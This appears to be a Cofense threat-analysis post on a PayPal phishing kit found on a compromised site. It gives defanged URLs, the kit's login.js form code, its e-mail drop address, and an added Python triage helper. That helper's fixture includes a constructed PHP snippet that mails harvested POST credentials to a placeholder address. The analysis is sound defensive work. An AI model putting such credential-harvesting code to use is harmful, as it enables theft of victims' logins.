Catching a Phresh Kit

Let’s follow this Phresh Catch and see where it takes us. We test the shortened link (one of the simplest techniques for trying to evade URL wrapping) and end up at a compromised GoDaddy hosted website – hxxp://teqzoft[.]com/websinfo/Confirm/websc_signin/.

Credential Phish Landing Page

Clean and basic, as long as you ignore the URL. It should be noted that attempting to connect to the phishing site over HTTP was unstable, hence the above connection over HTTPS. Continuing down the phish hole, we want to see how the phished credentials are saved or where they are sent. A quick check of the source code reveals two JS scripts being loaded.

<script type="text/javascript" src="../../lib/js/jquery.js"></script>
<script type="text/javascript" src="../../lib/js/login.js"></script>

jquery.js is a legitimate minified jQuery script file. Its MD5 hash did not match the file downloaded directly from jquery.com, but a diff of the two files ignoring all whitespace revealed that they were identical. login.js only handles UI functionality:

$(document).ready(function() {
    $("#formulario").submit(function(a) {
        a.preventDefault();
        var b = 0;
        $("#emay-add").val() || ($("#emay-add").parent().next(".ghalat-assi").addClass("show"), 
        $("#emay-add").addClass("error-motalat"), b = 1), $("#password").val() || ($("#password").parent().next(".ghalat-assi").addClass("show"), 
        $("#password").addClass("error-motalat"), $(".a-n-o-n-i-s-m-a").css("z-index: 100;"), 
        b = 1), 1 != b && ($(".dorawlididor").addClass("load-dayra"), $(".anchofhhh").show(), 
        setTimeout(function() {
            document.getElementById("formulario").submit();
        }, 1500));
    }), $("#emay-add").focus(function(a) {
        $("#emay-add").parent().next(".ghalat-assi").removeClass("show");
    }), $("#password").focus(function(a) {
        $("#password").parent().next(".ghalat-assi").removeClass("show");
    });
});

Is this the bottom of the phish hole? Let’s hope not. Many attackers are lazy and will leave the original zip archive on the server, available for download. This common technique has already been discussed by the industry, so we will leave it up to the reader to investigate further. Using this technique, we were able to download the original phish kit from hxxp://teqzoft[.]com/websinfo.zip. With a cursory code review of this phishing kit we quickly identify it as an old and already analyzed kit called Scam Paypal v1.10 by the author Shadow Z118. We now know that the forwarding of phished information is achieved through email and performed by the PHP scripts, and that the configured email for this campaign was pollwallens20140@yandex.com.
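As an added example (not part of the original post, and not code from the kit), a small Python triage helper that applies the two checks described above to an extracted kit: a whitespace-insensitive hash comparison of a bundled library against a vendor copy, as done for jquery.js, and a scan of the PHP files that call mail() for drop addresses and the form fields they harvest. The kit contents, paths and e-mail addresses it uses are constructed placeholders, not the contents of websinfo.zip.

```python
import hashlib
import re
# Constructed stand-in for an extracted kit: paths and contents are hypothetical
# and are not taken from the websinfo.zip archive discussed above.
KIT = {
    "lib/js/jquery.js": b"(function(a,b){var c=a.document;\n  b.fn=c;})(window);\n",
    "websc_signin/next.php": (
        b"<?php\n"
        b"$email = $_POST['emay-add'];\n"
        b"$pass = $_POST['password'];\n"
        b"$msg = \"Login: $email | Pass: $pass\";\n"
        b"$send = 'drop-placeholder@example.com';\n"
        b"mail($send, 'Result', $msg, 'From: kit-placeholder@example.com');\n"
        b"?>\n"
    ),
}
# Constructed reference copy: the same code as the kit's jquery.js, different whitespace.
REFERENCE_JQUERY = b"(function(a,b){var c=a.document;b.fn=c;})(window);"

def normalized_md5(data: bytes) -> str:
    """MD5 over the content with every whitespace byte removed, so copies that
    differ only in line breaks or indentation hash identically. Removing spaces
    inside tokens is lossy, so a match rules out tampering only approximately."""
    return hashlib.md5(re.sub(rb"\s+", b"", data)).hexdigest()

def library_matches_reference(kit_file: bytes, reference: bytes) -> dict:
    """Raw hashes differ as soon as whitespace differs; the normalized hash shows
    whether the bundled library is the vendor's code or a modified copy."""
    return {
        "raw_match": hashlib.md5(kit_file).digest() == hashlib.md5(reference).digest(),
        "normalized_match": normalized_md5(kit_file) == normalized_md5(reference),
    }

EMAIL_RE = re.compile(rb"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
MAIL_CALL_RE = re.compile(rb"\bmail\s*\(")
POST_FIELD_RE = re.compile(rb"\$_POST\['([^']+)'\]")

def php_mailers(kit: dict) -> dict:
    """For every PHP file that calls mail(), list the e-mail addresses it contains
    (drop address, sender) and the form fields it reads from $_POST. The drop
    address is the indicator that survives the kit being re-hosted elsewhere."""
    report = {}
    for path, content in kit.items():
        if path.endswith(".php") and MAIL_CALL_RE.search(content):
            report[path] = {
                "addresses": sorted({m.decode() for m in EMAIL_RE.findall(content)}),
                "fields": sorted({m.decode() for m in POST_FIELD_RE.findall(content)}),
            }
    return report
```

Point KIT at the files of a real extracted archive and the report lists each mailer script with its recipients and the credential fields it collects.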


All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks.